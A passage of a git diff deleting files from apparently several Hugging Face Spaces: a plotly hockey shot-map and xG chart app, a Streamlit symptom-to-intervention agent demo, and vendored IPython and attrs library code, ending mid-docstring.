line=dict(color="#FFFFFF",width=5), - ) - fig.add_shape(type="circle", - xref="x", yref="y", - x0=40, y0=-10, x1=100, y1=45, - line=dict(color="#FFFFFF",width=5)), - - fig.add_shape(type="circle", - xref="x", yref="y", - x0=-40, y0=-10, x1=-100, y1=45, - line=dict(color="#FFFFFF",width=5)), - - fig.add_shape(type="circle", - xref="x", yref="y", - x0=40, y0=10, x1=100, y1=-45, - line=dict(color="#FFFFFF",width=5)), - - fig.add_shape(type="rect", - x0=-99.5, y0=-18, x1=-30, y1=18, - line=dict( - color="#222222", - width=2, - ), - fillcolor="#222222", - ) - - fig.add_shape(type="rect", - x0=-70, y0=-44.5, x1=-30, y1=44.5, - line=dict( - color="#222222", - width=2, - ), - fillcolor="#222222", - ) - - fig.add_shape(type="rect", - x0=99.5, y0=-18, x1=30, y1=18, - line=dict( - color="#222222", - width=2, - ), - fillcolor="#222222", - ) - - fig.add_shape(type="rect", - x0=70, y0=-44.5, x1=30, y1=44.5, - line=dict( - color="#222222", - width=2, - ), - fillcolor="#222222", - ) - - - - fig.add_shape(type="line", - x0=-70, - y0=-45, - x1=70, - y1=-45,line=dict(color="#FFFFFF",width=5)) - fig.add_shape(type="line", - x0=-100, - y0=-17, - x1=-100, - y1=17,line=dict(color="#FFFFFF",width=5)) - fig.add_shape(type="line", - x0=0, - 
y0=-44.9, - x1=0, - y1=44.9,line=dict(color="#c76969",width=5)) - fig.add_shape(type="line", - x0=89, - y0=-38.1, - x1=89, - y1=38.1,line=dict(color="#c76969",width=4)) - fig.add_shape(type="line", - x0=25, - y0=-44.7, - x1=25, - y1=44.7,line=dict(color="#6987c7",width=5)) - fig.add_shape(type="line", - x0=-25, - y0=-44.7, - x1=-25, - y1=44.7,line=dict(color="#6987c7",width=5)) - - fig.add_shape(type="circle", - xref="x", yref="y", - x0=-15, y0=-15, x1=15, y1=15, - line=dict(color="#6998c7",width=4), - ) - fig.add_shape(type="circle", - xref="x", yref="y", - x0=53, y0=7, x1=83, y1=37, - line=dict(color="#c76969",width=4), - ) - fig.add_shape(type="circle", - xref="x", yref="y", - x0=-53, y0=7, x1=-83, y1=37, - line=dict(color="#c76969",width=4), - ) - fig.add_shape(type="circle", - xref="x", yref="y", - x0=-53, y0=-7, x1=-83, y1=-37, - line=dict(color="#c76969",width=4), - ) - fig.add_shape(type="circle", - xref="x", yref="y", - x0=53, y0=-7, x1=83, y1=-37, - line=dict(color="#c76969",width=4), - ) - fig.add_shape(type="line", - x0=-89, - y0=-38.1, - x1=-89, - y1=38.1,line=dict(color="#c76969",width=4)) - fig.add_shape(type="line", - x0=-89, - y0=-3, - x1=-89, - y1=3,line=dict(color="#FFFFFF",width=5)) - fig.add_shape(type="line", - x0=89, - y0=-3, - x1=89, - y1=3,line=dict(color="#FFFFFF",width=5)) - - fig.update_layout(xaxis=dict(showgrid=False,zeroline=False,visible= False), - yaxis=dict(showgrid=False,zeroline=False,visible= False), - width=1400,height=630 - ) - fig.update_layout(plot_bgcolor='#222222', - paper_bgcolor='#222222',) - fig.update_layout(title_text=away_team+' @ '+ home_team +' - '+ date +'
      All Unblocked Shot Attempts - '+strength_str + title_p, title_x=0.5) - fig.update_layout( - font_color="white",) - # Create custom shapes for the points - shots_list = home_shots['level_0'].to_list() - for s in shots_list: - xc=home_shots.loc[home_shots['level_0']==s]['xCordAdjusted'].tolist()[0] - yc=home_shots.loc[home_shots['level_0']==s]['yCordAdjusted'].tolist()[0] - xg = home_shots.loc[home_shots['level_0']==s]['xG'].tolist()[0] - t = home_shots.loc[home_shots['level_0']==s]['Event'].tolist()[0] - if t=="MISS": - c = "#fa5f5f" - elif t=='SHOT': - c="#fad85f" - else: - c="#8dfa5f" - if xg < .03: - mul = 25 - elif xg >=.03 and xg < .07: - mul = 23 - elif xg >= .07 and xg < .11: - mul = 20 - elif xg >= .11 and xg < .15: - mul = 17 - else: - mul = 7 - fig.add_shape( - type='circle', - x0=xc - xg*mul, - y0=yc - xg*mul, - x1=xc + xg*mul, - y1=yc + xg*mul, - fillcolor=c, - opacity=1, - line=dict(color="#FFFFFF",width=1) - ) - # Create custom shapes for the points - shots_list = away_shots['level_0'].to_list() - for s in shots_list: - xc=away_shots.loc[away_shots['level_0']==s]['xCordAdjusted'].tolist()[0] - yc=away_shots.loc[away_shots['level_0']==s]['yCordAdjusted'].tolist()[0] - xg = away_shots.loc[away_shots['level_0']==s]['xG'].tolist()[0] - t = away_shots.loc[away_shots['level_0']==s]['Event'].tolist()[0] - if t=="MISS": - c = "#fa5f5f" - elif t=='SHOT': - c="#fad85f" - else: - c="#8dfa5f" - if xg < .03: - mul = 25 - elif xg >=.03 and xg < .07: - mul = 23 - elif xg >= .07 and xg < .11: - mul = 20 - elif xg >= .11 and xg < .15: - mul = 17 - else: - mul = 7 - fig.add_shape( - type='circle', - x0=xc - xg*mul, - y0=yc - xg*mul, - x1=xc + xg*mul, - y1=yc + xg*mul, - fillcolor=c, - opacity=1, - line=dict(color="#FFFFFF",width=1) - ) - fig.add_annotation( - text = ("Data: @StatsByZach on Twitter") - , showarrow=False - , x = .79 - , y = -.03 - , xref='paper' - , yref='paper' - , xanchor='left' - , yanchor='bottom' - , xshift=-1 - , yshift=-5 - , font=dict(size=11, color="white") - , align="left" - ) - fig.add_annotation( - text = (home_team + "
      "+str(home_xg)+" xG") - , showarrow=False - , x = .80 - , y = 1.02 - , xref='paper' - , yref='paper' - , xanchor='left' - , yanchor='bottom' - , xshift=-1 - , yshift=-5 - , font=dict(size=15, color="white") - , align="center" - ) - fig.add_annotation( - text = (away_team+"
      "+str(away_xg)+" xG") - , showarrow=False - , x = .13 - , y = 1.02 - , xref='paper' - , yref='paper' - , xanchor='left' - , yanchor='bottom' - , xshift=-1 - , yshift=-5 - , font=dict(size=15, color="white") - , align="center" - ) - - return fig - @output - @render_widget - def xg_chart(): - game = game_shots - game = game[game['Game_Id']==int(game_id)] - away = game['Away_Team'].tolist()[0] - home = game['Home_Team'].tolist()[0] - f = game[game['Ev_Team']==home] - s = game[game['Ev_Team']==away] - date = game['Date'].tolist()[0] - f['cxG'] = f['xG'].cumsum() - s['cxG'] = s['xG'].cumsum() - fa = f['gameSeconds'].tolist() - if max(game['gameSeconds'].tolist()) > 3600: - max_seconds = max(game['gameSeconds'].tolist())+1 - else: - max_seconds=3600 - fa.append(max_seconds) - fa.insert(0,0) - fx = f['cxG'].tolist() - fx.insert(0,0) - fx.append(fx[-1]) - sa = s['gameSeconds'].tolist() - sa.append(max_seconds) - sa.insert(0,0) - sx = s['cxG'].tolist() - sx.insert(0,0) - sx.append(sx[-1]) - import numpy as np - from scipy.interpolate import interp1d - import plotly.graph_objects as go - - # Define colors at the top - TEAM1_COLOR = '#EBEBD3' - TEAM2_COLOR = '#F95738' - FILL_COLOR_TEAM1 = '#EBEBD3' # Corresponding fill color for Team 1 - FILL_COLOR_TEAM2 = '#F95738' # Corresponding fill color for Team 2 - - # Create a new time array with 1-second intervals - full_time = np.arange(0, max_seconds, 1) # 60 minutes with 1-second intervals - - # Interpolate both teams' data to this new time array - f_interp = interp1d(fa, fx, kind='linear', bounds_error=False, fill_value=(fx[0], fx[-1])) - s_interp = interp1d(sa, sx, kind='linear', bounds_error=False, fill_value=(sx[0], sx[-1])) - - fx_full = f_interp(full_time) - sx_full = s_interp(full_time) - - fig = go.Figure() - - # Find intersections - intersections = np.where(np.diff(np.sign(fx_full - sx_full)))[0] - - # Initialize starting index - start = 0 - - # Loop through intersections and plot segments - for idx in intersections: - if fx_full[idx] > sx_full[idx]: - fillcolor = FILL_COLOR_TEAM1 - else: - fillcolor = FILL_COLOR_TEAM2 - - fig.add_trace(go.Scatter(x=full_time[start:idx+2], y=fx_full[start:idx+2], mode='lines', line=dict(color=TEAM1_COLOR), showlegend=False)) - fig.add_trace(go.Scatter(x=full_time[start:idx+2], y=sx_full[start:idx+2], mode='lines', line=dict(color=TEAM2_COLOR), - fill='tonexty', fillcolor=fillcolor, showlegend=False)) - start = idx + 1 - - # Handle the last segment - if fx_full[start] > sx_full[start]: - fillcolor = FILL_COLOR_TEAM1 - else: - fillcolor = FILL_COLOR_TEAM2 - - fig.add_trace(go.Scatter(x=full_time[start:], y=fx_full[start:], mode='lines', line=dict(color=TEAM1_COLOR), showlegend=False)) - fig.add_trace(go.Scatter(x=full_time[start:], y=sx_full[start:], mode='lines', line=dict(color=TEAM2_COLOR), - fill='tonexty', fillcolor=fillcolor, showlegend=False)) - - # Update layout for axis labels, theme, and figure dimensions - fig.update_layout( - title="Cumulative xG
      "+away+ " @ " + home +" - " + date + "
      Strength: All situations", - xaxis_title="Time", - xaxis_showgrid=False, # Hide x-axis grid lines - yaxis_title="xG", - yaxis_showgrid=False, # Hide y-axis grid lines - template="plotly_dark", - width=1400, - height=700, - plot_bgcolor="#222222", # Set plot background color - paper_bgcolor="#222222", - xaxis_range=[0, 3600], - yaxis_range=[0, 5.5], - ) - - # Add legend entries - fig.add_trace(go.Scatter(x=[None], y=[None], mode='lines', line=dict(color=TEAM1_COLOR), name=home)) - fig.add_trace(go.Scatter(x=[None], y=[None], mode='lines', line=dict(color=TEAM2_COLOR), name=away)) - if max_seconds==3600: - fig.update_layout( - xaxis_range=[0, 3600], - xaxis=dict( - tickvals=[0,1200,2400,3600], # positions of tick marks - ticktext=["0","20","40","60"] # text to display at those positions - ) - ) - else: - fig.update_layout( - xaxis_range=[0, max_seconds], - xaxis=dict( - tickvals=[0,1200,2400,3600,4800], # positions of tick marks - ticktext=["0","20","40","60","80"] # text to display at those positions - ) - ) - fig.update_layout(hovermode=False) - return fig -game = App(ui.page_fluid( - ui.tags.base(href=base_url), - ui.tags.div( - {"style": "width:75%;margin: 0 auto"}, - ui.tags.style( - """ - h4 { - margin-top: 1em;font-size:35px; - } - h2{ - font-size:25px; - } - """ - ), - shinyswatch.theme.darkly(), - ui.tags.h4("Stats By Zach"), - ui.tags.i("A website for hockey analytics"), - ui.navset_tab( - ui.nav_control( - ui.a( - "Home", - href="home/" - ), - ), - ui.nav_menu( - "Skater Charts", - ui.nav_control( - ui.a( - "On-Ice xG Rates", - href="skater-xg-rates/" - ), - ui.a( - "On-Ice xGF%", - href="skater-xg-percentages/" - ), - ), - ), - ui.nav_menu( - "Goalie Charts", - ui.nav_control( - ui.a( - "GSAx Timeline", - href="gsax-timeline/" - ), - ui.a( - "GSAx Leaderboard", - href="gsax-leaderboard/" - ), - ui.a( - "GSAx Comparison", - href="gsax-comparison/" - ) - ), - ),ui.nav_menu( - "Team Charts", - ui.nav_control( - ui.a( - "Team xG Rates", - href="team-xg-rates/" - ), - ), - ),ui.nav_control( - ui.a( - "Games", - href="games/" - ), - ),ui.nav_control( - ui.a( - "About", - href="about/" - ), - )),ui.row( - ui.column(12,ui.tags.br(),ui.tags.h2(ui.output_text("game_info_teams")),ui.tags.h2(ui.output_text("game_info_date")),ui.tags.h5("Shot Map"),ui.tags.h5("Select strength"),ui.input_select("strength", "", ["All",'Even','5v5']),ui.tags.h5("Select period"),ui.input_select("period", "",["All",1,2,3] ), - )),ui.row(ui.column(1),ui.column(11,output_widget("my_widget3"),output_widget("xg_chart"),ui.tags.br()), - ),ui.row(ui.tags.h5("On-Ice xGF%'s"),ui.tags.h5("Strength", class_="app-heading"),ui.input_select("strength_for_bars", "",{'even':"Even",'_5v5':"5v5",'All':"All Situations"})),ui.row(ui.column(6,output_widget("my_widget2")),ui.column(6,output_widget("my_widget"))))),server) \ No newline at end of file diff --git a/spaces/Stearns/crl-demo/Logic_Demo.py b/spaces/Stearns/crl-demo/Logic_Demo.py deleted file mode 100644 index d7f710c9e6c30374f6d72b88f78402e7f7f3ade0..0000000000000000000000000000000000000000 --- a/spaces/Stearns/crl-demo/Logic_Demo.py +++ /dev/null @@ -1,155 +0,0 @@ -import pandas as pd -import json -import streamlit as st - -import shared_streamlit_funcs as my - -if "ld_num_ss_inputs" not in st.session_state: - st.session_state["ld_num_ss_inputs"] = 1 - -def increment_ss_inputs(): - st.session_state.ld_num_ss_inputs += 1 -def decrement_ss_inputs(): - st.session_state.ld_num_ss_inputs = max(1, st.session_state.ld_num_ss_inputs-1) - -def short_cg(cg): - return 
{"Teaching, Guidance, and Counseling":"Teaching...", - "Case Management":"Case Mngmnt", - "Surveillance":"Surveillance", - "Treatments and Procedures":"Treatments..."}[cg] - -def json_to_output_df(json_str, input_list): - indata =json.loads(json_str) - outdata = {"Output":[""]*len(input_list), "Explanation":[""]*len(input_list)} - # Format is: {:{output:[{associated-item:{...}}], explanation:{tested-features:{...}}}} - haserr = False - - try: - # Process output for each op type - for opname,opdata in indata.items(): - # Process output for each input - for response in opdata: - # Process the output and explanation - if "explanation" not in response or "output" not in response: - continue - ss_ind = input_list.index(response["explanation"]["tested-features"]["member-data"]["sign-symptom"][0]) - outdata["Explanation"][ss_ind] = json.dumps(response["explanation"]["tested-features"]["member-data"]) - outdata["Output"][ss_ind] = json.dumps(response["output"][0]["associated-item"]) - except Exception as e: - print("ERROR in LogicDemo json_to_output_df(): "+str(e)) - haserr = True - - if haserr: - retval = pd.DataFrame() - else: - retval = pd.DataFrame(data=outdata) - - return retval - - -# Initialize the session -if "agent" not in st.session_state: - my.init() - -## SET UP STREAMLIT PAGE -# emojis: https://www.webfx.com/tools/emoji-cheat-sheet/ -st.set_page_config(page_title="🧠CRL Demo", layout="wide") -st.subheader("Cognitive Reasoner Lite Demo") -st.title("Generalized Rule Logic") -st.markdown("**Demonstrates teaching the agent a single rule that lets it respond to many inputs.**") - - -## Define S/S and intervention concepts -ss_list = [ - "Decreased Bowel Sounds", - "Difficulty Providing Preventive and Therapeutic Health Care", - "Limited Recall of Long Past Events", - "Infection", - "Heartburn/Belching/Indigestion", - "Electrolyte Imbalance", - "Difficulty Expressing Grief Responses", - "Absent/Abnormal Response To Sound", - "Minimal Shared Activities" -] -intvn_list = [ - ("Teaching, Guidance, and Counseling","Anatomy/Physiology","bowel function"), - ("Case Management","Other Community Resources","long term care options"), - ("Teaching, Guidance, and Counseling","Continuity of Care","simplified routine"), - ("Teaching, Guidance, and Counseling","Wellness","prevention of infection/sepsis"), - ("Surveillance","Signs/Symptoms-Physical","epigastric / heartburn pain or discomfort"), - ("Surveillance","Signs/Symptoms-Physical","intake and output"), - ("Case Management","Support Group","age/cultural/condition-specific groups"), - ("Teaching, Guidance, and Counseling","Signs/Symptoms-Physical","increased hearing loss/other changes"), - ("Teaching, Guidance, and Counseling","Behavioral Health Care","therapy to strengthen family support systems"), -] - -# Reset the agent before defining and linking concepts -agent_config = my.make_agent() - -# Allow the user to choose how to map S/Ss to Interventions -st.header("Training:") -st.subheader("How do you want the agent to map symptoms to interventions?") - -map_xpnd = st.expander(label="Mappings",expanded=True) - -row = map_xpnd.container() -map_col1, map_col2 = row.columns(2) -map_col1.subheader("Symptom") -map_col2.subheader("Intervention") -intvn_labels = [short_cg(cg)+"; "+tg+"; "+cd for (cg, tg, cd) in intvn_list] -# cd_list = [list(t) for t in zip(*intvn_list)][-1] # Transpose the list of tuples and convert to a list and get just the last list -for ind,ss in enumerate(ss_list): - row = map_xpnd.container() - map_col1, map_col2 = row.columns(2) - 
map_col1.text(ss) - intvn_select = map_col2.selectbox(label="Maps to Intervention:",options=range(len(intvn_labels)),index=ind, key="mapbox-"+str(ind), format_func=lambda x: intvn_labels[x]) - # Tell the agent to associate this S/S with this intvn - ss_concept = st.session_state.agent.getConcept("{'member-data':{'sign-symptom':'"+ss+"'}}") - cg,tg,cd = intvn_list[intvn_select] - intvn_concept = st.session_state.agent.getConcept("{'intervention':{'category':'"+cg+"','target':'"+tg+"','care-descriptor':'"+cd+"'}}") - st.session_state.agent.linkConcepts(agent_config.decisionTypeId, "SS-INTVN", ss_concept, intvn_concept) - -st.subheader("What do you want the agent to report?") -select_report_attr = st.selectbox(label="Intervention element", options=["Category","Target","Care Descriptor", "All"], index=1) -report_attr = {"Category":"category", "Target":"target", "Care Descriptor":"care-descriptor", "All":""}[select_report_attr] - -# Define action behavior to report result (triggered as soon as the intervention concept is active in WM) -# Report just the active 'target-id' elements of the intervention associated with the matched condition -intvn_conc = st.session_state.agent.getConcept("{'intervention':null}") -st.session_state.agent.trainAction(agent_config, intvn_conc, my.ReportActiveConceptActionInList("associated-item", report_attr)) - -st.markdown("---") -st.header("Input:") -st.subheader("Choose a request to send to the agent.") - -if st.session_state.ld_num_ss_inputs > len(ss_list): - st.session_state.ld_num_ss_inputs = len(ss_list) -ss_input_select_list = [st.selectbox(label="Signs/Symptom:", options=ss_list, index=i, key="ss_in-"+str(i)) for i in range(st.session_state.ld_num_ss_inputs)] -in_col1, in_col2 = st.columns(8)[0:2] -in_col1.button(label="New Input", on_click=increment_ss_inputs, disabled=(st.session_state.ld_num_ss_inputs >= len(ss_list))) -in_col2.button(label="Remove Input", on_click=decrement_ss_inputs, disabled=(st.session_state.ld_num_ss_inputs <= 1)) # em: —, en: – - - -# Send a partial pattern to the agent's input -st.session_state.agent.clearInput() -for select in ss_input_select_list: - st.session_state.agent.addInput("{'member-data':{'sign-symptom':'"+select+"'}}") - - -st.markdown("---") -st.header("Agent Output:") -# Show the input to the user -io_col1, io_col2 = st.columns(2) -io_col1.text("Input sent to agent:") -io_col1.dataframe(data={'Signs/Symptoms':ss_input_select_list}) -io_col1.text_area(label="Raw JSON Input", value=st.session_state.agent.getInputAsJsonString(), height=200) - -# Run the agent with the given input to get a corresponding memory -st.session_state.agent.setMaxOpCycles(-1) -st.session_state.agent.queryDecision(agent_config.decisionTypeId, 5) - -output = st.session_state.agent.getOutputAsJsonString() -query_time_ms = st.session_state.agent.getLastQueryTime()/1000000.0 -io_col2.text("Agent Response: ("+str(query_time_ms)+" ms)") -io_col2.dataframe(data=json_to_output_df(output, ss_input_select_list),) -io_col2.text_area(label="Raw JSON Output:",value=output, height=500) diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/magics/logging.py b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/magics/logging.py deleted file mode 100644 index b6b8d8a5af6d4c083858766586228bcaa373804a..0000000000000000000000000000000000000000 --- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/magics/logging.py +++ /dev/null @@ -1,195 +0,0 @@ -"""Implementation of magic functions for IPython's own 
logging. -""" -#----------------------------------------------------------------------------- -# Copyright (c) 2012 The IPython Development Team. -# -# Distributed under the terms of the Modified BSD License. -# -# The full license is in the file COPYING.txt, distributed with this software. -#----------------------------------------------------------------------------- - -#----------------------------------------------------------------------------- -# Imports -#----------------------------------------------------------------------------- - -# Stdlib -import os -import sys - -# Our own packages -from IPython.core.magic import Magics, magics_class, line_magic -from warnings import warn -from traitlets import Bool - -#----------------------------------------------------------------------------- -# Magic implementation classes -#----------------------------------------------------------------------------- - -@magics_class -class LoggingMagics(Magics): - """Magics related to all logging machinery.""" - - quiet = Bool(False, help= - """ - Suppress output of log state when logging is enabled - """ - ).tag(config=True) - - @line_magic - def logstart(self, parameter_s=''): - """Start logging anywhere in a session. - - %logstart [-o|-r|-t|-q] [log_name [log_mode]] - - If no name is given, it defaults to a file named 'ipython_log.py' in your - current directory, in 'rotate' mode (see below). - - '%logstart name' saves to file 'name' in 'backup' mode. It saves your - history up to that point and then continues logging. - - %logstart takes a second optional parameter: logging mode. This can be one - of (note that the modes are given unquoted): - - append - Keep logging at the end of any existing file. - - backup - Rename any existing file to name~ and start name. - - global - Append to a single logfile in your home directory. - - over - Overwrite any existing log. - - rotate - Create rotating logs: name.1~, name.2~, etc. - - Options: - - -o - log also IPython's output. In this mode, all commands which - generate an Out[NN] prompt are recorded to the logfile, right after - their corresponding input line. The output lines are always - prepended with a '#[Out]# ' marker, so that the log remains valid - Python code. - - Since this marker is always the same, filtering only the output from - a log is very easy, using for example a simple awk call:: - - awk -F'#\\[Out\\]# ' '{if($2) {print $2}}' ipython_log.py - - -r - log 'raw' input. Normally, IPython's logs contain the processed - input, so that user lines are logged in their final form, converted - into valid Python. For example, %Exit is logged as - _ip.magic("Exit"). If the -r flag is given, all input is logged - exactly as typed, with no transformations applied. - - -t - put timestamps before each input line logged (these are put in - comments). - - -q - suppress output of logstate message when logging is invoked - """ - - opts,par = self.parse_options(parameter_s,'ortq') - log_output = 'o' in opts - log_raw_input = 'r' in opts - timestamp = 't' in opts - quiet = 'q' in opts - - logger = self.shell.logger - - # if no args are given, the defaults set in the logger constructor by - # ipython remain valid - if par: - try: - logfname,logmode = par.split() - except: - logfname = par - logmode = 'backup' - else: - logfname = logger.logfname - logmode = logger.logmode - # put logfname into rc struct as if it had been called on the command - # line, so it ends up saved in the log header Save it in case we need - # to restore it... 
- old_logfile = self.shell.logfile - if logfname: - logfname = os.path.expanduser(logfname) - self.shell.logfile = logfname - - loghead = u'# IPython log file\n\n' - try: - logger.logstart(logfname, loghead, logmode, log_output, timestamp, - log_raw_input) - except: - self.shell.logfile = old_logfile - warn("Couldn't start log: %s" % sys.exc_info()[1]) - else: - # log input history up to this point, optionally interleaving - # output if requested - - if timestamp: - # disable timestamping for the previous history, since we've - # lost those already (no time machine here). - logger.timestamp = False - - if log_raw_input: - input_hist = self.shell.history_manager.input_hist_raw - else: - input_hist = self.shell.history_manager.input_hist_parsed - - if log_output: - log_write = logger.log_write - output_hist = self.shell.history_manager.output_hist - for n in range(1,len(input_hist)-1): - log_write(input_hist[n].rstrip() + u'\n') - if n in output_hist: - log_write(repr(output_hist[n]),'output') - else: - logger.log_write(u'\n'.join(input_hist[1:])) - logger.log_write(u'\n') - if timestamp: - # re-enable timestamping - logger.timestamp = True - - if not (self.quiet or quiet): - print ('Activating auto-logging. ' - 'Current session state plus future input saved.') - logger.logstate() - - @line_magic - def logstop(self, parameter_s=''): - """Fully stop logging and close log file. - - In order to start logging again, a new %logstart call needs to be made, - possibly (though not necessarily) with a new filename, mode and other - options.""" - self.shell.logger.logstop() - - @line_magic - def logoff(self, parameter_s=''): - """Temporarily stop logging. - - You must have previously started logging.""" - self.shell.logger.switch_log(0) - - @line_magic - def logon(self, parameter_s=''): - """Restart logging. - - This function is for restarting logging which you've temporarily - stopped with %logoff. For starting logging for the first time, you - must use the %logstart function, which allows you to specify an - optional log filename.""" - - self.shell.logger.switch_log(1) - - @line_magic - def logstate(self, parameter_s=''): - """Print the status of the logging system.""" - - self.shell.logger.logstate() diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/tests/bad_all.py b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/tests/bad_all.py deleted file mode 100644 index a7716ab6f328de060c5e472dfd2e8d47ee21a99d..0000000000000000000000000000000000000000 --- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/tests/bad_all.py +++ /dev/null @@ -1,14 +0,0 @@ -"""Module with bad __all__ - -To test https://github.com/ipython/ipython/issues/9678 -""" - -def evil(): - pass - -def puppies(): - pass - -__all__ = [evil, # Bad - 'puppies', # Good - ] diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/sphinxext/ipython_console_highlighting.py b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/sphinxext/ipython_console_highlighting.py deleted file mode 100644 index b93a151fb3cb0c4eaa02420e35c5994a54abeb38..0000000000000000000000000000000000000000 --- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/sphinxext/ipython_console_highlighting.py +++ /dev/null @@ -1,28 +0,0 @@ -""" -reST directive for syntax-highlighting ipython interactive sessions. 
- -""" - -from sphinx import highlighting -from IPython.lib.lexers import IPyLexer - -def setup(app): - """Setup as a sphinx extension.""" - - # This is only a lexer, so adding it below to pygments appears sufficient. - # But if somebody knows what the right API usage should be to do that via - # sphinx, by all means fix it here. At least having this setup.py - # suppresses the sphinx warning we'd get without it. - metadata = {'parallel_read_safe': True, 'parallel_write_safe': True} - return metadata - -# Register the extension as a valid pygments lexer. -# Alternatively, we could register the lexer with pygments instead. This would -# require using setuptools entrypoints: http://pygments.org/docs/plugins - -ipy2 = IPyLexer(python3=False) -ipy3 = IPyLexer(python3=True) - -highlighting.lexers['ipython'] = ipy2 -highlighting.lexers['ipython2'] = ipy2 -highlighting.lexers['ipython3'] = ipy3 diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/terminal/tests/test_pt_inputhooks.py b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/terminal/tests/test_pt_inputhooks.py deleted file mode 100644 index 3f788c738cffdca794b72dcf2f5c488c17a1d0af..0000000000000000000000000000000000000000 --- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/terminal/tests/test_pt_inputhooks.py +++ /dev/null @@ -1,50 +0,0 @@ -import os -import importlib - -import pytest - -from IPython.terminal.pt_inputhooks import set_qt_api, get_inputhook_name_and_func - - -guis_avail = [] - - -def _get_qt_vers(): - """If any version of Qt is available, this will populate `guis_avail` with 'qt' and 'qtx'. Due - to the import mechanism, we can't import multiple versions of Qt in one session.""" - for gui in ["qt", "qt6", "qt5"]: - print(f"Trying {gui}") - try: - set_qt_api(gui) - importlib.import_module("IPython.terminal.pt_inputhooks.qt") - guis_avail.append(gui) - if "QT_API" in os.environ.keys(): - del os.environ["QT_API"] - except ImportError: - pass # that version of Qt isn't available. - except RuntimeError: - pass # the version of IPython doesn't know what to do with this Qt version. - - -_get_qt_vers() - - -@pytest.mark.skipif( - len(guis_avail) == 0, reason="No viable version of PyQt or PySide installed." -) -def test_inputhook_qt(): - # Choose the "best" Qt version. - gui_ret, _ = get_inputhook_name_and_func("qt") - - assert gui_ret != "qt" # you get back the specific version that was loaded. - assert gui_ret in guis_avail - - if len(guis_avail) > 2: - # ...and now we're stuck with this version of Qt for good; can't switch. - for not_gui in ["qt6", "qt5"]: - if not_gui != gui_ret: - break - # Try to import the other gui; it won't work. - gui_ret2, _ = get_inputhook_name_and_func(not_gui) - assert gui_ret2 == gui_ret - assert gui_ret2 != not_gui diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/attr/_make.py b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/attr/_make.py deleted file mode 100644 index d72f738eeca66ea96ec836f57720a7f5d6ec5169..0000000000000000000000000000000000000000 --- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/attr/_make.py +++ /dev/null @@ -1,2987 +0,0 @@ -# SPDX-License-Identifier: MIT - -import copy -import enum -import linecache -import sys -import types -import typing - -from operator import itemgetter - -# We need to import _compat itself in addition to the _compat members to avoid -# having the thread-local in the globals here. -from . 
import _compat, _config, setters -from ._compat import ( - PY310, - _AnnotationExtractor, - get_generic_base, - set_closure_cell, -) -from .exceptions import ( - DefaultAlreadySetError, - FrozenInstanceError, - NotAnAttrsClassError, - UnannotatedAttributeError, -) - - -# This is used at least twice, so cache it here. -_obj_setattr = object.__setattr__ -_init_converter_pat = "__attr_converter_%s" -_init_factory_pat = "__attr_factory_%s" -_classvar_prefixes = ( - "typing.ClassVar", - "t.ClassVar", - "ClassVar", - "typing_extensions.ClassVar", -) -# we don't use a double-underscore prefix because that triggers -# name mangling when trying to create a slot for the field -# (when slots=True) -_hash_cache_field = "_attrs_cached_hash" - -_empty_metadata_singleton = types.MappingProxyType({}) - -# Unique object for unequivocal getattr() defaults. -_sentinel = object() - -_ng_default_on_setattr = setters.pipe(setters.convert, setters.validate) - - -class _Nothing(enum.Enum): - """ - Sentinel to indicate the lack of a value when ``None`` is ambiguous. - - If extending attrs, you can use ``typing.Literal[NOTHING]`` to show - that a value may be ``NOTHING``. - - .. versionchanged:: 21.1.0 ``bool(NOTHING)`` is now False. - .. versionchanged:: 22.2.0 ``NOTHING`` is now an ``enum.Enum`` variant. - """ - - NOTHING = enum.auto() - - def __repr__(self): - return "NOTHING" - - def __bool__(self): - return False - - -NOTHING = _Nothing.NOTHING -""" -Sentinel to indicate the lack of a value when ``None`` is ambiguous. -""" - - -class _CacheHashWrapper(int): - """ - An integer subclass that pickles / copies as None - - This is used for non-slots classes with ``cache_hash=True``, to avoid - serializing a potentially (even likely) invalid hash value. Since ``None`` - is the default value for uncalculated hashes, whenever this is copied, - the copy's value for the hash should automatically reset. - - See GH #613 for more details. - """ - - def __reduce__(self, _none_constructor=type(None), _args=()): - return _none_constructor, _args - - -def attrib( - default=NOTHING, - validator=None, - repr=True, - cmp=None, - hash=None, - init=True, - metadata=None, - type=None, - converter=None, - factory=None, - kw_only=False, - eq=None, - order=None, - on_setattr=None, - alias=None, -): - """ - Create a new attribute on a class. - - .. warning:: - - Does *not* do anything unless the class is also decorated with - `attr.s` / `attrs.define` / et cetera! - - Please consider using `attrs.field` in new code (``attr.ib`` will *never* - go away, though). - - :param default: A value that is used if an *attrs*-generated ``__init__`` - is used and no value is passed while instantiating or the attribute is - excluded using ``init=False``. - - If the value is an instance of `attrs.Factory`, its callable will be - used to construct a new value (useful for mutable data types like lists - or dicts). - - If a default is not set (or set manually to `attrs.NOTHING`), a value - *must* be supplied when instantiating; otherwise a `TypeError` - will be raised. - - The default can also be set using decorator notation as shown below. - - :type default: Any value - - :param callable factory: Syntactic sugar for - ``default=attr.Factory(factory)``. - - :param validator: `callable` that is called by *attrs*-generated - ``__init__`` methods after the instance has been initialized. They - receive the initialized instance, the :func:`~attrs.Attribute`, and the - passed value. 
